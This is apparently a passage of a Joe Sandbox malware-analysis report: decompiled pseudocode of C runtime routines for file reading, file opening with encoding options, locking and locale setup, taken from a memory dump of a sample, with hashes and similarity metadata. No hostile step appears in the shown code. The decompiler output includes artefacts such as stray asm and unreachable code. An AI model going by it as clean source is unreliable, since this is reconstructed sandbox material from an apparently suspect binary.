                                                          								_t100 = 0x1000;
                                                          							} else {
                                                          								_t100 =  *(_t119 + 0x18);
                                                          							}
                                                          							_v16 = _t100;
                                                          							__eflags = _t117;
                                                          							if(_t117 == 0) {
                                                          								L41:
                                                          								return _a16;
                                                          							} else {
                                                          								do {
                                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          										L24:
                                                          										__eflags = _t98 - _t100;
                                                          										if(_t98 < _t100) {
                                                          											_t81 = E009AF572(_t98, _t119, _t119); // executed
                                                          											__eflags = _t81 - 0xffffffff;
                                                          											if(_t81 == 0xffffffff) {
                                                          												L46:
                                                          												return (_t117 - _t98) / _a12;
                                                          											}
                                                          											_t102 = _v12;
                                                          											__eflags = _t102;
                                                          											if(_t102 == 0) {
                                                          												L42:
                                                          												__eflags = _a8 - 0xffffffff;
                                                          												if(_a8 != 0xffffffff) {
                                                          													E009AE740(_a4, 0, _a8);
                                                          												}
                                                          												 *((intOrPtr*)(E009AF100())) = 0x22;
                                                          												L4:
                                                          												E009AEB1E();
                                                          												goto L5;
                                                          											}
                                                          											_t110 = _v8;
                                                          											 *_t110 = _t81;
                                                          											_t98 = _t98 - 1;
                                                          											_v8 = _t110 + 1;
                                                          											_t103 = _t102 - 1;
                                                          											__eflags = _t103;
                                                          											_v12 = _t103;
                                                          											_t100 =  *(_t119 + 0x18);
                                                          											_v16 = _t100;
                                                          											goto L40;
                                                          										}
                                                          										__eflags = _t100;
                                                          										if(_t100 == 0) {
                                                          											_t86 = 0x7fffffff;
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t86 = _t98;
                                                          											}
                                                          										} else {
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t44 = _t98 % _t100;
                                                          												__eflags = _t44;
                                                          												_t113 = _t44;
                                                          												_t91 = _t98;
                                                          											} else {
                                                          												_t113 = 0x7fffffff % _t100;
                                                          												_t91 = 0x7fffffff;
                                                          											}
                                                          											_t86 = _t91 - _t113;
                                                          										}
                                                          										__eflags = _t86 - _v12;
                                                          										if(_t86 > _v12) {
                                                          											goto L42;
                                                          										} else {
                                                          											_push(_t86);
                                                          											_push(_v8);
                                                          											_push(E009AF693(_t119)); // executed
                                                          											_t88 = E009AF84A(); // executed
                                                          											_t120 = _t120 + 0xc;
                                                          											__eflags = _t88;
                                                          											if(_t88 == 0) {
                                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                          												goto L46;
                                                          											}
                                                          											__eflags = _t88 - 0xffffffff;
                                                          											if(_t88 == 0xffffffff) {
                                                          												L45:
                                                          												_t64 = _t119 + 0xc;
                                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                          												__eflags =  *_t64;
                                                          												goto L46;
                                                          											}
                                                          											_t98 = _t98 - _t88;
                                                          											__eflags = _t98;
                                                          											L36:
                                                          											_v8 = _v8 + _t88;
                                                          											_v12 = _v12 - _t88;
                                                          											_t100 = _v16;
                                                          											goto L40;
                                                          										}
                                                          									}
                                                          									_t94 =  *(_t119 + 4);
                                                          									_v20 = _t94;
                                                          									__eflags = _t94;
                                                          									if(__eflags == 0) {
                                                          										goto L24;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										goto L45;
                                                          									}
                                                          									__eflags = _t98 - _t94;
                                                          									if(_t98 < _t94) {
                                                          										_t94 = _t98;
                                                          										_v20 = _t98;
                                                          									}
                                                          									_t104 = _v12;
                                                          									__eflags = _t94 - _t104;
                                                          									if(_t94 > _t104) {
                                                          										goto L42;
                                                          									} else {
                                                          										E009AF6B7(_v8, _t104,  *_t119, _t94);
                                                          										_t88 = _v20;
                                                          										_t120 = _t120 + 0x10;
                                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                          										_t98 = _t98 - _t88;
                                                          										 *_t119 =  *_t119 + _t88;
                                                          										goto L36;
                                                          									}
                                                          									L40:
                                                          									__eflags = _t98;
                                                          								} while (_t98 != 0);
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                                          					__eflags = _t97 - _t74;
                                                          					if(_t97 <= _t74) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				L3:
                                                          				 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          				goto L4;
                                                          			}





























                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: dec36020ab5e21e387c48e588288fb4903bd2f480129c21f6f16942797cf5b7f
                                                          • Instruction ID: caf1a86da483b6d82a2ba1a17679e1ed2f350771cc86c9dba7a5160017a99b48
                                                          • Opcode Fuzzy Hash: dec36020ab5e21e387c48e588288fb4903bd2f480129c21f6f16942797cf5b7f
                                                          • Instruction Fuzzy Hash: D451B230E00705DBDF249FA9988466EB7A9AF53324F248B29F826962D0E775DD508BD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Figure: control-flow graph of function 9a696e; legend: Executed / Not Executed]
                                                          C-Code - Quality: 99%
                                                          			E009A696E(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
                                                          				signed int _t34;
                                                          				signed short _t35;
                                                          				void* _t37;
                                                          				intOrPtr* _t41;
                                                          				void* _t43;
                                                          				void* _t44;
                                                          				void* _t45;
                                                          				void* _t46;
                                                          				void* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				void* _t51;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				signed int _t56;
                                                          				void* _t59;
                                                          				void* _t62;
                                                          				signed int _t63;
                                                          				signed int _t66;
                                                          				intOrPtr* _t68;
                                                          				void* _t69;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          
                                                          				_t66 = __esi;
                                                          				_t63 = __edi;
                                                          				_t62 = __edx;
                                                          				_t59 = __ecx;
                                                          				_t56 = __ebx;
                                                          				_t34 = __eax;
                                                          				while(1) {
                                                          					asm("rol byte [ebx-0x70f0ac08], 0x8a");
                                                          					 *_t34 =  *_t34 + _t34;
                                                          					_t1 = _t66 + _t66 * 2 - 0x7d;
                                                          					 *_t1 =  *((intOrPtr*)(_t66 + _t66 * 2 - 0x7d)) + _t62;
                                                          					_t75 =  *_t1;
                                                          					if(_t75 == 0) {
                                                          						if( *((intOrPtr*)(_t69 - 4)) != 0) {
                                                          							goto L37;
                                                          						} else {
                                                          							 *((intOrPtr*)(_t69 - 4)) = 1;
                                                          							_t56 = _t56 | 0x00000020;
                                                          						}
                                                          						goto L39;
                                                          					} else {
                                                          						_t50 = _t34 - 0x20;
                                                          						if(_t50 == 0) {
                                                          							L39:
                                                          							_t66 = _t66 + 2;
                                                          							_t35 =  *_t66 & 0x0000ffff;
                                                          							if(_t35 != 0) {
                                                          								if(_t59 == 0) {
                                                          									goto L40;
                                                          								} else {
                                                          									_t34 = _t35 & 0x0000ffff;
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								L40:
                                                          								if( *((intOrPtr*)(_t69 - 8)) == 0) {
                                                          									L56:
                                                          									_t37 = 0x20;
                                                          									while( *_t66 == _t37) {
                                                          										_t66 = _t66 + 2;
                                                          									}
                                                          									if( *_t66 != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										_t43 = E009B2D65(_t69 + 0xc,  *((intOrPtr*)(_t69 + 8)), _t56,  *((intOrPtr*)(_t69 + 0x10)), 0x180); // executed
                                                          										if(_t43 != 0) {
                                                          											goto L2;
                                                          										} else {
                                                          											_t41 =  *((intOrPtr*)(_t69 + 0x14));
                                                          											 *0x9cf1ec =  *0x9cf1ec + 1;
                                                          											 *((intOrPtr*)(_t41 + 4)) = 0;
                                                          											 *_t41 = 0;
                                                          											 *((intOrPtr*)(_t41 + 8)) = 0;
                                                          											 *((intOrPtr*)(_t41 + 0x1c)) = 0;
                                                          											 *(_t41 + 0xc) = _t63;
                                                          											 *((intOrPtr*)(_t41 + 0x10)) =  *((intOrPtr*)(_t69 + 0xc));
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_t44 = 0x20;
                                                          									while( *_t66 == _t44) {
                                                          										_t66 = _t66 + 2;
                                                          									}
                                                          									_t45 = E009B2D83("ccs", _t66, 3);
                                                          									_t74 = _t71 + 0xc;
                                                          									if(_t45 != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										_t68 = _t66 + 6;
                                                          										_t46 = 0x20;
                                                          										while( *_t68 == _t46) {
                                                          											_t68 = _t68 + 2;
                                                          										}
                                                          										if( *_t68 != 0x3d) {
                                                          											goto L1;
                                                          										} else {
                                                          											do {
                                                          												_t68 = _t68 + 2;
                                                          											} while ( *_t68 == _t46);
                                                          											_t47 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-8", 5);
                                                          											_t71 = _t74 + 0xc;
                                                          											if(_t47 != 0) {
                                                          												_t48 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-16LE", 8);
                                                          												_t71 = _t71 + 0xc;
                                                          												if(_t48 != 0) {
                                                          													_t49 = E009B2E52(_t56, _t59, _t68, _t68, L"UNICODE", 7);
                                                          													_t71 = _t71 + 0xc;
                                                          													if(_t49 != 0) {
                                                          														goto L1;
                                                          													} else {
                                                          														_t66 = _t68 + 0xe;
                                                          														_t56 = _t56 | 0x00010000;
                                                          														goto L56;
                                                          													}
                                                          												} else {
                                                          													_t66 = _t68 + 0x10;
                                                          													_t56 = _t56 | 0x00020000;
                                                          													goto L56;
                                                          												}
                                                          											} else {
                                                          												_t66 = _t68 + 0xa;
                                                          												_t56 = _t56 | 0x00040000;
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t51 = _t50 - 0xb;
                                                          							if(_t51 == 0) {
                                                          								if((_t56 & 0x00000002) != 0) {
                                                          									goto L37;
                                                          								} else {
                                                          									_t56 = _t56 & 0xfffffffe | 0x00000002;
                                                          									_t63 = _t63 & 0xfffffffc | 0x00000080;
                                                          								}
                                                          								goto L39;
                                                          							} else {
                                                          								_t52 = _t51 - 1;
                                                          								if(_t52 == 0) {
                                                          									 *((intOrPtr*)(_t69 - 8)) = 1;
                                                          									goto L37;
                                                          								} else {
                                                          									_t53 = _t52 - 0x18;
                                                          									if(_t53 == 0) {
                                                          										if((_t56 & 0x00000040) != 0) {
                                                          											goto L37;
                                                          										} else {
                                                          											_t56 = _t56 | 0x00000040;
                                                          										}
                                                          										goto L39;
                                                          									} else {
                                                          										_t54 = _t53 - 0xa;
                                                          										if(_t54 == 0) {
                                                          											_t56 = _t56 | 0x00000080;
                                                          											goto L39;
                                                          										} else {
                                                          											_t55 = _t54 - 4;
                                                          											if(_t55 != 0) {
                                                          												L1:
                                                          												 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          												E009AEB1E();
                                                          												L2:
                                                          												_t41 = 0;
                                                          											} else {
                                                          												if( *((intOrPtr*)(_t69 - 4)) != _t55) {
                                                          													L37:
                                                          													_t59 = 0;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t69 - 4)) = 1;
                                                          													_t56 = _t56 | 0x00000010;
                                                          												}
                                                          												goto L39;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					L62:
                                                          					return _t41;
                                                          					__eax = __eax - 0x54;
                                                          					if(__eax == 0) {
                                                          						__eax =  *(__ebp + 0xc);
                                                          						if((__eax & __ebx) == 0) {
                                                          							__ebx = __ebx | __eax;
                                                          						} else {
                                                          							goto L37;
                                                          						}
                                                          						goto L39;
                                                          					} else {
                                                          						__eax = __eax - 0xe;
                                                          						if(__eax == 0) {
                                                          							if((__ebx & 0x0000c000) != 0) {
                                                          								goto L37;
                                                          							} else {
                                                          								__ebx = __ebx | 0x00008000;
                                                          							}
                                                          							goto L39;
                                                          						} else {
                                                          							__eax = __eax - 1;
                                                          							if(__eax == 0) {
                                                          								if(__edx != 0) {
                                                          									goto L37;
                                                          								} else {
                                                          									__edx = __edx + 1;
                                                          									__edi = __edi | 0x00004000;
                                                          								}
                                                          								goto L39;
                                                          							} else {
                                                          								__eax = __eax - 0xb;
                                                          								if(__eax == 0) {
                                                          									if(__edx != 0) {
                                                          										goto L37;
                                                          									} else {
                                                          										__edx = __edx + 1;
                                                          										__edi = __edi & 0xffffbfff;
                                                          									}
                                                          									goto L39;
                                                          								} else {
                                                          									__eax = __eax - 6;
                                                          									if(__eax != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										if((__ebx & 0x0000c000) != 0) {
                                                          											goto L37;
                                                          										} else {
                                                          											__ebx = __ebx | 0x00004000;
                                                          										}
                                                          										goto L39;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L62;
                                                          				}
                                                          			}


                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$__sopen_s
                                                          • String ID: UTF-8$ccs
                                                          • API String ID: 857951187-3758431669
                                                          • Opcode ID: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction ID: 4b2e69dc4f78fac0a1503b9ee42290595fd844123da3f70e22aeeef58802cad3
                                                          • Opcode Fuzzy Hash: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction Fuzzy Hash: 0031F772D043529EEB305F649C04A697BA8DB17354F24886FE845DB1C2E670CD80C7E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 9ae6aa-9ae6be call 9af1e0 318 9ae6c0-9ae6c3 315->318 319 9ae6f1 315->319 318->319 320 9ae6c5-9ae6ca 318->320 321 9ae6f3-9ae6f8 call 9af225 319->321 322 9ae6f9-9ae710 call 9aec39 call 9ae4ca 320->322 323 9ae6cc-9ae6d0 320->323 335 9ae715-9ae72b call 9ae733 322->335 326 9ae6d2-9ae6de call 9ae740 323->326 327 9ae6e1-9ae6ec call 9af100 call 9aeb1e 323->327 326->327 327->319 335->321
                                                          C-Code - Quality: 89%
                                                          			E009AE6AA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				intOrPtr _t16;
                                                          				intOrPtr _t19;
                                                          				intOrPtr _t29;
                                                          				void* _t32;
                                                          
                                                          				_push(0xc);
                                                          				_push(0x9cc0b0);
                                                          				E009AF1E0(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                                                          				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                                                          					L6:
                                                          					_t16 = 0;
                                                          				} else {
                                                          					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                                                          					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                                                          						E009AEC39(_t31);
                                                          						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                          						_t19 = E009AE4CA( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                                                          						_t29 = _t19;
                                                          						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                                                          						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                          						E009AE733(_t31);
                                                          						_t16 = _t29;
                                                          					} else {
                                                          						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                                                          							E009AE740( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                                                          						}
                                                          						 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						E009AEB1E();
                                                          						goto L6;
                                                          					}
                                                          				}
                                                          				return E009AF225(_t16);
                                                          			}








                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: 87ee1bd5ba8a3f7cae3f8e5468f1a69940e34cebf956f59f654f3e6eb34109c2
                                                          • Instruction ID: 323f31f0f9d33f493c4898de26724252b738a9424484a2625008708f6a16134b
                                                          • Opcode Fuzzy Hash: 87ee1bd5ba8a3f7cae3f8e5468f1a69940e34cebf956f59f654f3e6eb34109c2
                                                          • Instruction Fuzzy Hash: EE016771800219EBCF12AFA5CC02B9E7B75AFD2360F148615F82457191D7758A21DFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 9ae38b-9ae39f call 9ae3e5
                                                          C-Code - Quality: 25%
                                                          			E009AE38B(intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __ebp;
                                                          				void* _t3;
                                                          				void* _t4;
                                                          				void* _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t10;
                                                          
                                                          				_push(0x40);
                                                          				_push(_a8);
                                                          				_push(_a4);
                                                          				_t3 = E009AE3E5(_t4, _t5, _t6, _t7, _t10); // executed
                                                          				return _t3;
                                                          			}











                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                          • Instruction ID: 03ee7efac9cbe160172f0330c46c8336adebe5bb8d9aa8a063a39b2db402a7e1
                                                          • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                          • Instruction Fuzzy Hash: A2B0927244020C77CE012A82EC02B493B5A9B816A4F008020FB0C191A1AA73A66096C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E009A3663(void* __ecx, void* __edx, void* __edi, signed int __esi) {
                                                          				void* __ebx;
                                                          				signed int _t232;
                                                          				intOrPtr* _t308;
                                                          				signed int _t389;
                                                          				void* _t390;
                                                          				void* _t392;
                                                          				void* _t393;
                                                          				void* _t395;
                                                          				signed int _t398;
                                                          				signed int _t399;
                                                          				signed int _t400;
                                                          				signed int _t401;
                                                          				signed int _t402;
                                                          				signed int _t403;
                                                          				signed int _t404;
                                                          				signed int _t405;
                                                          				signed int _t406;
                                                          				signed int _t407;
                                                          				signed int _t408;
                                                          				signed int _t409;
                                                          				signed int _t410;
                                                          				signed int _t411;
                                                          				signed int _t412;
                                                          				signed int _t413;
                                                          				signed int _t414;
                                                          				signed int _t415;
                                                          				signed int _t416;
                                                          				signed int _t417;
                                                          				signed int _t418;
                                                          				signed int _t419;
                                                          				signed int _t420;
                                                          				signed int _t421;
                                                          				signed int _t422;
                                                          				signed int _t423;
                                                          				signed int _t424;
                                                          				signed int _t425;
                                                          				signed int _t426;
                                                          				signed int _t427;
                                                          				signed int _t428;
                                                          				signed int _t429;
                                                          				signed int _t430;
                                                          				signed int _t431;
                                                          				signed int _t432;
                                                          				signed int _t433;
                                                          				signed int _t434;
                                                          				signed int _t435;
                                                          				signed int _t436;
                                                          				signed int _t437;
                                                          				signed int _t438;
                                                          				signed int _t439;
                                                          				signed int _t440;
                                                          				signed int _t441;
                                                          				signed int _t442;
                                                          				signed int _t443;
                                                          				signed int _t444;
                                                          				signed int _t450;
                                                          				signed int _t451;
                                                          				signed int _t452;
                                                          				signed int _t453;
                                                          				signed int _t454;
                                                          				signed int _t455;
                                                          				signed int _t456;
                                                          				signed int _t457;
                                                          				signed int _t458;
                                                          				signed int _t459;
                                                          				signed int _t460;
                                                          				signed int _t461;
                                                          				signed int _t462;
                                                          				signed int _t463;
                                                          				signed int _t464;
                                                          				signed int _t465;
                                                          				signed int _t466;
                                                          				signed int _t467;
                                                          				signed int _t468;
                                                          				signed int _t469;
                                                          				signed int _t470;
                                                          				signed int _t471;
                                                          				signed int _t472;
                                                          				signed int _t473;
                                                          				signed int _t474;
                                                          				signed int _t475;
                                                          				void* _t477;
                                                          
                                                          				_t393 = __edx;
                                                          				_t392 = __ecx;
                                                          				_t398 = __esi | E009B4CB1(_t390, __edi, __esi, _t477 - 8, 1, _t390, 0x2d, __edi + 0x2c);
                                                          				_t399 = _t398 | E009B4CB1(_t390, __edi, _t398, _t477 - 8, 1, _t390, 0x2e, __edi + 0x30);
                                                          				_t400 = _t399 | E009B4CB1(_t390, __edi, _t399, _t477 - 8, 1, _t390, 0x2f, __edi + 0x34);
                                                          				_t401 = _t400 | E009B4CB1(_t390, __edi, _t400, _t477 - 8, 1, _t390, 0x30, __edi + 0x1c);
                                                          				_t402 = _t401 | E009B4CB1(_t390, __edi, _t401, _t477 - 8, 1, _t390, 0x44, __edi + 0x38);
                                                          				_t403 = _t402 | E009B4CB1(_t390, __edi, _t402, _t477 - 8, 1, _t390, 0x45, __edi + 0x3c);
                                                          				_t404 = _t403 | E009B4CB1(_t390, __edi, _t403, _t477 - 8, 1, _t390, 0x46, __edi + 0x40);
                                                          				_t405 = _t404 | E009B4CB1(_t390, __edi, _t404, _t477 - 8, 1, _t390, 0x47, __edi + 0x44);
                                                          				_t406 = _t405 | E009B4CB1(_t390, __edi, _t405, _t477 - 8, 1, _t390, 0x48, __edi + 0x48);
                                                          				_t407 = _t406 | E009B4CB1(_t390, __edi, _t406, _t477 - 8, 1, _t390, 0x49, __edi + 0x4c);
                                                          				_t408 = _t407 | E009B4CB1(_t390, __edi, _t407, _t477 - 8, 1, _t390, 0x4a, __edi + 0x50);
                                                          				_t409 = _t408 | E009B4CB1(_t390, __edi, _t408, _t477 - 8, 1, _t390, 0x4b, __edi + 0x54);
                                                          				_t410 = _t409 | E009B4CB1(_t390, __edi, _t409, _t477 - 8, 1, _t390, 0x4c, __edi + 0x58);
                                                          				_t411 = _t410 | E009B4CB1(_t390, __edi, _t410, _t477 - 8, 1, _t390, 0x4d, __edi + 0x5c);
                                                          				_t412 = _t411 | E009B4CB1(_t390, __edi, _t411, _t477 - 8, 1, _t390, 0x4e, __edi + 0x60);
                                                          				_t413 = _t412 | E009B4CB1(_t390, __edi, _t412, _t477 - 8, 1, _t390, 0x4f, __edi + 0x64);
                                                          				_t414 = _t413 | E009B4CB1(_t390, __edi, _t413, _t477 - 8, 1, _t390, 0x38, __edi + 0x68);
                                                          				_t415 = _t414 | E009B4CB1(_t390, __edi, _t414, _t477 - 8, 1, _t390, 0x39, __edi + 0x6c);
                                                          				_t416 = _t415 | E009B4CB1(_t390, __edi, _t415, _t477 - 8, 1, _t390, 0x3a, __edi + 0x70);
                                                          				_t417 = _t416 | E009B4CB1(_t390, __edi, _t416, _t477 - 8, 1, _t390, 0x3b, __edi + 0x74);
                                                          				_t418 = _t417 | E009B4CB1(_t390, __edi, _t417, _t477 - 8, 1, _t390, 0x3c, __edi + 0x78);
                                                          				_t419 = _t418 | E009B4CB1(_t390, __edi, _t418, _t477 - 8, 1, _t390, 0x3d, __edi + 0x7c);
                                                          				_t420 = _t419 | E009B4CB1(_t390, __edi, _t419, _t477 - 8, 1, _t390, 0x3e, __edi + 0x80);
                                                          				_t421 = _t420 | E009B4CB1(_t390, __edi, _t420, _t477 - 8, 1, _t390, 0x3f, __edi + 0x84);
                                                          				_t232 = __edi + 0x88;
                                                          				_push(_t232);
                                                          				_push(0x40);
                                                          				_push(_t390);
                                                          				_push(1);
                                                          				 *((intOrPtr*)(_t477 - 0x17af07bb)) =  *((intOrPtr*)(_t477 - 0x17af07bb)) + _t392;
                                                          				_t395 = __edi +  *((intOrPtr*)(_t393 - 0x3b7c0001));
                                                          				_push(_t232);
                                                          				_t422 = _t421 | _t232;
                                                          				_t423 = _t422 | E009B4CB1(_t390, _t395, _t422, _t477 - 8, 1, _t390, 0x41, _t395 + 0x8c);
                                                          				_t424 = _t423 | E009B4CB1(_t390, _t395, _t423, _t477 - 8, 1, _t390, 0x42, _t395 + 0x90);
                                                          				_t425 = _t424 | E009B4CB1(_t390, _t395, _t424, _t477 - 8, 1, _t390, 0x43, _t395 + 0x94);
                                                          				_t426 = _t425 | E009B4CB1(_t390, _t395, _t425, _t477 - 8, 1, _t390, 0x28, _t395 + 0x98);
                                                          				_t427 = _t426 | E009B4CB1(_t390, _t395, _t426, _t477 - 8, 1, _t390, 0x29, _t395 + 0x9c);
                                                          				_t428 = _t427 | E009B4CB1(_t390, _t395, _t427, _t477 - 8, 1, _t390, 0x1f, _t395 + 0xa0);
                                                          				_t429 = _t428 | E009B4CB1(_t390, _t395, _t428, _t477 - 8, 1, _t390, 0x20, _t395 + 0xa4);
                                                          				_t430 = _t429 | E009B4CB1(_t390, _t395, _t429, _t477 - 8, 1, _t390, 0x1003, _t395 + 0xa8);
                                                          				_t431 = _t430 | E009B4CB1(_t390, _t395, _t430, _t477 - 8, 0, _t390, 0x1009, _t395 + 0xac);
                                                          				_t432 = _t431 | E009B4CB1(_t390, _t395, _t431, _t477 - 8, 2, _t390, 0x31, _t395 + 0xb8);
                                                          				_t433 = _t432 | E009B4CB1(_t390, _t395, _t432, _t477 - 8, 2, _t390, 0x32, _t395 + 0xbc);
                                                          				_t434 = _t433 | E009B4CB1(_t390, _t395, _t433, _t477 - 8, 2, _t390, 0x33, _t395 + 0xc0);
                                                          				_t435 = _t434 | E009B4CB1(_t390, _t395, _t434, _t477 - 8, 2, _t390, 0x34, _t395 + 0xc4);
                                                          				_t436 = _t435 | E009B4CB1(_t390, _t395, _t435, _t477 - 8, 2, _t390, 0x35, _t395 + 0xc8);
                                                          				_t437 = _t436 | E009B4CB1(_t390, _t395, _t436, _t477 - 8, 2, _t390, 0x36, _t395 + 0xcc);
                                                          				_t438 = _t437 | E009B4CB1(_t390, _t395, _t437, _t477 - 8, 2, _t390, 0x37, _t395 + 0xb4);
                                                          				_t439 = _t438 | E009B4CB1(_t390, _t395, _t438, _t477 - 8, 2, _t390, 0x2a, _t395 + 0xd4);
                                                          				_t440 = _t439 | E009B4CB1(_t390, _t395, _t439, _t477 - 8, 2, _t390, 0x2b, _t395 + 0xd8);
                                                          				_t441 = _t440 | E009B4CB1(_t390, _t395, _t440, _t477 - 8, 2, _t390, 0x2c, _t395 + 0xdc);
                                                          				_t442 = _t441 | E009B4CB1(_t390, _t395, _t441, _t477 - 8, 2, _t390, 0x2d, _t395 + 0xe0);
                                                          				_t443 = _t442 | E009B4CB1(_t390, _t395, _t442, _t477 - 8, 2, _t390, 0x2e, _t395 + 0xe4);
                                                          				_t444 = _t443 | E009B4CB1(_t390, _t395, _t443, _t477 - 8, 2, _t390, 0x2f, _t395 + 0xe8);
                                                          				_t445 = _t444 | E009B4CB1(_t390, _t395, _t444, _t477 - 8, 2, _t390, 0x30, _t395 + 0xd0);
